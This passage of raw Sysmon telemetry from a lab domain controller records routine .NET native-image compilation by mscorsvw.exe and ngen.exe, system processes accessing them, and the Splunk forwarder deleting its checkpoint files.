.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:46.513{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19fc-0\System.DirectoryServices.Protocols.dll2021-06-23 21:05:46.513 10341000x800000000000000021633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.106{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=966A92FF873A9E36852D68993952F9E4,SHA256=7AA43CDB2C8C4286DDFC8ACA65BB2CD664DA870CFA47C99C023A66FAB140F482,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.106{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.106{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8404-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8304-00000000CF01}6808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8304-00000000CF01}6808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.013{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8304-00000000CF01}6808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:47.950{4DB9351A-A22B-60D3-8A04-00000000CF01}6756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a64-0\System.EnterpriseServices.dll2021-06-23 21:05:47.950 11241100x800000000000000021658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:47.919{4DB9351A-A22B-60D3-8A04-00000000CF01}6756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a64-0\System.EnterpriseServices.Wrapper.dll2021-06-23 21:05:47.919 23542300x800000000000000021657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.794{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C71EDDB54CAD5C4B8BAAF84A42D04A4B,SHA256=2E148FFD581CAB7A3E8B6E43F9026CC78F79127DD2CC74628661A351C1E8ACF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.513{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22B-60D3-8A04-00000000CF01}6756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.497{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22B-60D3-8A04-00000000CF01}6756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.497{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22B-60D3-8A04-00000000CF01}6756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.450{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22B-60D3-8904-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.419{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22B-60D3-8904-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.419{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22B-60D3-8904-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:47.356{4DB9351A-A22B-60D3-8804-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\304-0\System.Dynamic.dll2021-06-23 21:05:47.356 10341000x800000000000000021649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.107{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22B-60D3-8804-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.107{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=414F7DE387F3E07AB726D0BEE4A10066,SHA256=337724CF8E4B05B4E9E37DA396C2274720237D368819099B847A2CBAED60287A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.075{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22B-60D3-8804-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.075{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22B-60D3-8804-00000000CF01}772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:47.013{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22A-60D3-8704-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.997{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8704-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:46.997{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8704-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.810{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62F201F1EED5EF5601C29EA8B9C6FB1A,SHA256=413C49490BEB50B76B127D7B5CE78A572AFB18668869D753A3841DD2A757A62C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.419{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37DE29E09286F6EF4FA5A105E5F68085,SHA256=0C904EE09191C9FDE771FF920546B89C772B4F3AC9F8ED7DD669F96089D53BBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.325{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22C-60D3-8C04-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.294{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22C-60D3-8C04-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 